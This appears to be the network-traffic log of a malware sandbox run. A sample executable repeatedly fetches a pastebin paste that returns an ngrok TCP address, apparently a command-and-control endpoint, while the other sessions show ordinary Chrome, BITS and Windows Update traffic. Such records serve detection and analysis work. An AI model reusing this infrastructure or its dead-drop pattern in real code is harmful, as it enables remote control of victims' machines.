2024-05-02 04:01:01 UTC	738	OUT	GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YJbhGPufzLEGIjDTt_akc_527nJ4zoGCbAZn0AkDcVIV2VLuAM78mz4Tuc4onQdlIzVDE6yNOrZBZH0yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: 1P_JAR=2024-05-02-04; NID=513=TDdb6B1qf0imS6sQ9UI386TSBmUeGbONEAs1g_SjFnFVZT8tlWjduo1BWv8tK_X2kdpw5DyqH6DyKssZClnoNAKybygsq-HKlTpEzxscqZJ_pjS1BKmEZAqlwshMLYfbeJHYWJdOjDcEir8XmubnkA88KvIUU07OLdpJjmvAUwk
2024-05-02 04:01:01 UTC	356	IN	HTTP/1.1 429 Too Many Requests Date: Thu, 02 May 2024 04:01:01 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/html Server: HTTP server (unknown) Content-Length: 3113 X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-05-02 04:01:01 UTC	899	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 70 72 6f 6d 6f 73 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>https://www.google.com/async/newtab_promos</title></head
2024-05-02 04:01:01 UTC	1255	IN	Data Raw: 61 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 28 72 65 73 70 6f 6e 73 65 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 61 70 74 63 68 61 2d 66 6f 72 6d 27 29 2e 73 75 62 6d 69 74 28 29 3b 7d 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 64 69 76 20 69 64 3d 22 72 65 63 61 70 74 63 68 61 22 20 63 6c 61 73 73 3d 22 67 2d 72 65 63 61 70 74 63 68 61 22 20 64 61 74 61 2d 73 69 74 65 6b 65 79 3d 22 36 4c 66 77 75 79 55 54 41 41 41 41 41 4f 41 6d 6f 53 30 66 64 71 69 6a 43 32 50 62 62 64 48 34 6b 6a 71 36 32 59 31 62 22 20 64 61 74 61 2d 63 61 6c 6c 62 61 63 6b 3d 22 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 22 20 64 61 74 61 2d 73 3d 22 33 47 30 51 70 41 65 32 56 6d 66 47 69 4f 4a 39 44 4f 41 75 58 45 35 63 32 66 54 43 32 75 65 37 6b Data Ascii: ack = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" data-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="3G0QpAe2VmfGiOJ9DOAuXE5c2fTC2ue7k
2024-05-02 04:01:01 UTC	959	IN	Data Raw: 6f 67 6c 65 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 64 65 74 65 63 74 73 20 72 65 71 75 65 73 74 73 20 63 6f 6d 69 6e 67 20 66 72 6f 6d 20 79 6f 75 72 20 63 6f 6d 70 75 74 65 72 20 6e 65 74 77 6f 72 6b 20 77 68 69 63 68 20 61 70 70 65 61 72 20 74 6f 20 62 65 20 69 6e 20 76 69 6f 6c 61 74 69 6f 6e 20 6f 66 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 6f 6c 69 63 69 65 73 2f 74 65 72 6d 73 2f 22 3e 54 65 72 6d 73 20 6f 66 20 53 65 72 76 69 63 65 3c 2f 61 3e 2e 20 54 68 65 20 62 6c 6f 63 6b 20 77 69 6c 6c 20 65 78 70 69 72 65 20 73 68 6f 72 74 6c 79 20 61 66 74 65 72 20 74 68 6f 73 65 20 72 65 71 75 65 73 74 73 20 73 74 6f 70 2e 20 20 49 6e 20 74 68 65 20 6d 65 61 6e 74 69 6d 65 2c 20 73 6f 6c 76 69 6e Data Ascii: ogle automatically detects requests coming from your computer network which appear to be in violation of the <a href="//www.google.com/policies/terms/">Terms of Service</a>. The block will expire shortly after those requests stop. In the meantime, solvin

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49739	142.251.40.228	443	7256	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-02 04:01:01 UTC	912	OUT	GET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgS_YJbhGPufzLEGIjDqkokB_Yx903z9S8-TdyWhW8iPlrZBrgRiiMPzrxlLxgoQH634QKXADTY9t1vdNmMyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: 1P_JAR=2024-05-02-04; NID=513=TDdb6B1qf0imS6sQ9UI386TSBmUeGbONEAs1g_SjFnFVZT8tlWjduo1BWv8tK_X2kdpw5DyqH6DyKssZClnoNAKybygsq-HKlTpEzxscqZJ_pjS1BKmEZAqlwshMLYfbeJHYWJdOjDcEir8XmubnkA88KvIUU07OLdpJjmvAUwk
2024-05-02 04:01:01 UTC	356	IN	HTTP/1.1 429 Too Many Requests Date: Thu, 02 May 2024 04:01:01 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/html Server: HTTP server (unknown) Content-Length: 3185 X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-05-02 04:01:01 UTC	899	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 6f 67 62 3f 68 6c 3d 65 6e 2d 55 53 26 61 6d 70 3b 61 73 79 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>https://www.google.com/async/newtab_ogb?hl=en-US&asy
2024-05-02 04:01:01 UTC	1255	IN	Data Raw: 0a 3c 73 63 72 69 70 74 3e 76 61 72 20 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 28 72 65 73 70 6f 6e 73 65 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 61 70 74 63 68 61 2d 66 6f 72 6d 27 29 2e 73 75 62 6d 69 74 28 29 3b 7d 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 64 69 76 20 69 64 3d 22 72 65 63 61 70 74 63 68 61 22 20 63 6c 61 73 73 3d 22 67 2d 72 65 63 61 70 74 63 68 61 22 20 64 61 74 61 2d 73 69 74 65 6b 65 79 3d 22 36 4c 66 77 75 79 55 54 41 41 41 41 41 4f 41 6d 6f 53 30 66 64 71 69 6a 43 32 50 62 62 64 48 34 6b 6a 71 36 32 59 31 62 22 20 64 61 74 61 2d 63 61 6c 6c 62 61 63 6b 3d 22 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 22 20 64 61 74 61 2d 73 3d 22 6b 78 61 4e 70 32 7a 43 56 Data Ascii: <script>var submitCallback = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" data-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="kxaNp2zCV
2024-05-02 04:01:01 UTC	1031	IN	Data Raw: 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 65 6d 3b 22 3e 0a 54 68 69 73 20 70 61 67 65 20 61 70 70 65 61 72 73 20 77 68 65 6e 20 47 6f 6f 67 6c 65 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 64 65 74 65 63 74 73 20 72 65 71 75 65 73 74 73 20 63 6f 6d 69 6e 67 20 66 72 6f 6d 20 79 6f 75 72 20 63 6f 6d 70 75 74 65 72 20 6e 65 74 77 6f 72 6b 20 77 68 69 63 68 20 61 70 70 65 61 72 20 74 6f 20 62 65 20 69 6e 20 76 69 6f 6c 61 74 69 6f 6e 20 6f 66 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 6f 6c 69 63 69 65 73 2f 74 65 72 6d 73 2f 22 3e 54 65 72 6d 73 20 6f 66 20 53 65 72 76 69 63 65 3c 2f 61 3e 2e 20 54 68 65 20 62 6c 6f 63 6b 20 77 69 6c 6c 20 65 78 70 69 72 65 20 73 68 6f 72 74 6c 79 20 61 66 74 Data Ascii: ; line-height:1.4em;">This page appears when Google automatically detects requests coming from your computer network which appear to be in violation of the <a href="//www.google.com/policies/terms/">Terms of Service</a>. The block will expire shortly aft

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49743	104.118.8.139	443

Timestamp	Bytes transferred	Direction	Data
2024-05-02 04:01:06 UTC	161	OUT	HEAD /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-05-02 04:01:06 UTC	466	IN	HTTP/1.1 200 OK Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (chd/073D) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-eus-z1 Cache-Control: public, max-age=97352 Date: Thu, 02 May 2024 04:01:06 GMT Connection: close X-CID: 2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49744	104.118.8.139	443

Timestamp	Bytes transferred	Direction	Data
2024-05-02 04:01:06 UTC	239	OUT	GET /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT Range: bytes=0-2147483646 User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-05-02 04:01:06 UTC	530	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Tue, 16 May 2017 22:58:00 GMT ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" ApiVersion: Distribute 1.1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json X-Azure-Ref: 0rcGnYgAAAAANOnx9vccHTr21ROgX9ESTU0pDRURHRTAzMDkAY2VmYzI1ODMtYTliMi00NGE3LTk3NTUtYjc2ZDE3ZTA1Zjdm Cache-Control: public, max-age=97362 Date: Thu, 02 May 2024 04:01:06 GMT Content-Length: 55 Connection: close X-CID: 2
2024-05-02 04:01:06 UTC	55	IN	Data Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49745	104.20.3.235	443	2472	C:\Users\user\Desktop\G1lnGpOLK4.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-02 04:01:07 UTC	74	OUT	GET /raw/s4TipmJt HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
2024-05-02 04:01:07 UTC	388	IN	HTTP/1.1 200 OK Date: Thu, 02 May 2024 04:01:07 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: MISS Last-Modified: Thu, 02 May 2024 04:01:07 GMT Server: cloudflare CF-RAY: 87d51bb3a9c60ca6-EWR
2024-05-02 04:01:07 UTC	29	IN	Data Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a Data Ascii: 170.tcp.eu.ngrok.io:15155
2024-05-02 04:01:07 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49746	40.68.123.157	443

Timestamp	Bytes transferred	Direction	Data
2024-05-02 04:01:12 UTC	306	OUT	GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=hBoxWr7ezrOa1ze&MD=M6HZe6PE HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-05-02 04:01:12 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880" MS-CorrelationId: e70080eb-e66b-4ba2-96f3-bb5cb80b8b85 MS-RequestId: 0a10ddeb-fa30-4d44-815c-db20fda5122a MS-CV: 0s2PZRdpBEm8Q7mr.0 X-Microsoft-SLSClientCache: 2880 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Thu, 02 May 2024 04:01:12 GMT Connection: close Content-Length: 24490
2024-05-02 04:01:12 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58 Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
2024-05-02 04:01:12 UTC	8666	IN	Data Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31 Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49753	104.20.3.235	443	2472	C:\Users\user\Desktop\G1lnGpOLK4.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-02 04:01:16 UTC	50	OUT	GET /raw/s4TipmJt HTTP/1.1 Host: pastebin.com
2024-05-02 04:01:16 UTC	395	IN	HTTP/1.1 200 OK Date: Thu, 02 May 2024 04:01:16 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 9 Last-Modified: Thu, 02 May 2024 04:01:07 GMT Server: cloudflare CF-RAY: 87d51beca8ab8c27-EWR
2024-05-02 04:01:16 UTC	29	IN	Data Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a Data Ascii: 170.tcp.eu.ngrok.io:15155
2024-05-02 04:01:16 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49755	104.20.3.235	443	2472	C:\Users\user\Desktop\G1lnGpOLK4.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-02 04:01:21 UTC	50	OUT	GET /raw/s4TipmJt HTTP/1.1 Host: pastebin.com
2024-05-02 04:01:21 UTC	396	IN	HTTP/1.1 200 OK Date: Thu, 02 May 2024 04:01:21 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 14 Last-Modified: Thu, 02 May 2024 04:01:07 GMT Server: cloudflare CF-RAY: 87d51c0e1e008c57-EWR
2024-05-02 04:01:21 UTC	29	IN	Data Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a Data Ascii: 170.tcp.eu.ngrok.io:15155
2024-05-02 04:01:21 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49757	104.20.3.235	443	2472	C:\Users\user\Desktop\G1lnGpOLK4.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-02 04:01:26 UTC	50	OUT	GET /raw/s4TipmJt HTTP/1.1 Host: pastebin.com
2024-05-02 04:01:26 UTC	396	IN	HTTP/1.1 200 OK Date: Thu, 02 May 2024 04:01:26 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 19 Last-Modified: Thu, 02 May 2024 04:01:07 GMT Server: cloudflare CF-RAY: 87d51c2f1e5d5e78-EWR
2024-05-02 04:01:26 UTC	29	IN	Data Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a Data Ascii: 170.tcp.eu.ngrok.io:15155
2024-05-02 04:01:26 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49759	104.20.3.235	443	2472	C:\Users\user\Desktop\G1lnGpOLK4.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-02 04:01:32 UTC	50	OUT	GET /raw/s4TipmJt HTTP/1.1 Host: pastebin.com
2024-05-02 04:01:32 UTC	396	IN	HTTP/1.1 200 OK Date: Thu, 02 May 2024 04:01:32 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 25 Last-Modified: Thu, 02 May 2024 04:01:07 GMT Server: cloudflare CF-RAY: 87d51c503c5fc443-EWR
2024-05-02 04:01:32 UTC	29	IN	Data Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a Data Ascii: 170.tcp.eu.ngrok.io:15155
2024-05-02 04:01:32 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49761	104.20.3.235	443	2472	C:\Users\user\Desktop\G1lnGpOLK4.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-02 04:01:37 UTC	50	OUT	GET /raw/s4TipmJt HTTP/1.1 Host: pastebin.com
2024-05-02 04:01:37 UTC	396	IN	HTTP/1.1 200 OK Date: Thu, 02 May 2024 04:01:37 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 30 Last-Modified: Thu, 02 May 2024 04:01:07 GMT Server: cloudflare CF-RAY: 87d51c713fc272aa-EWR
2024-05-02 04:01:37 UTC	29	IN	Data Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a Data Ascii: 170.tcp.eu.ngrok.io:15155
2024-05-02 04:01:37 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49763	104.20.3.235	443	2472	C:\Users\user\Desktop\G1lnGpOLK4.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-02 04:01:42 UTC	50	OUT	GET /raw/s4TipmJt HTTP/1.1 Host: pastebin.com
2024-05-02 04:01:42 UTC	396	IN	HTTP/1.1 200 OK Date: Thu, 02 May 2024 04:01:42 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 35 Last-Modified: Thu, 02 May 2024 04:01:07 GMT Server: cloudflare CF-RAY: 87d51c925d1442e6-EWR
2024-05-02 04:01:42 UTC	29	IN	Data Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a Data Ascii: 170.tcp.eu.ngrok.io:15155
2024-05-02 04:01:42 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49765	104.20.3.235	443	2472	C:\Users\user\Desktop\G1lnGpOLK4.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-02 04:01:48 UTC	50	OUT	GET /raw/s4TipmJt HTTP/1.1 Host: pastebin.com
2024-05-02 04:01:48 UTC	396	IN	HTTP/1.1 200 OK Date: Thu, 02 May 2024 04:01:48 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 41 Last-Modified: Thu, 02 May 2024 04:01:07 GMT Server: cloudflare CF-RAY: 87d51cb51e681a13-EWR
2024-05-02 04:01:48 UTC	29	IN	Data Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a Data Ascii: 170.tcp.eu.ngrok.io:15155
2024-05-02 04:01:48 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49768	104.20.3.235	443	2472	C:\Users\user\Desktop\G1lnGpOLK4.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-02 04:01:53 UTC	50	OUT	GET /raw/s4TipmJt HTTP/1.1 Host: pastebin.com
2024-05-02 04:01:53 UTC	396	IN	HTTP/1.1 200 OK Date: Thu, 02 May 2024 04:01:53 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 46 Last-Modified: Thu, 02 May 2024 04:01:07 GMT Server: cloudflare CF-RAY: 87d51cd61eee41c1-EWR
2024-05-02 04:01:53 UTC	29	IN	Data Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a Data Ascii: 170.tcp.eu.ngrok.io:15155
2024-05-02 04:01:53 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49767	40.68.123.157	443

Timestamp	Bytes transferred	Direction	Data
2024-05-02 04:01:53 UTC	306	OUT	GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=hBoxWr7ezrOa1ze&MD=M6HZe6PE HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
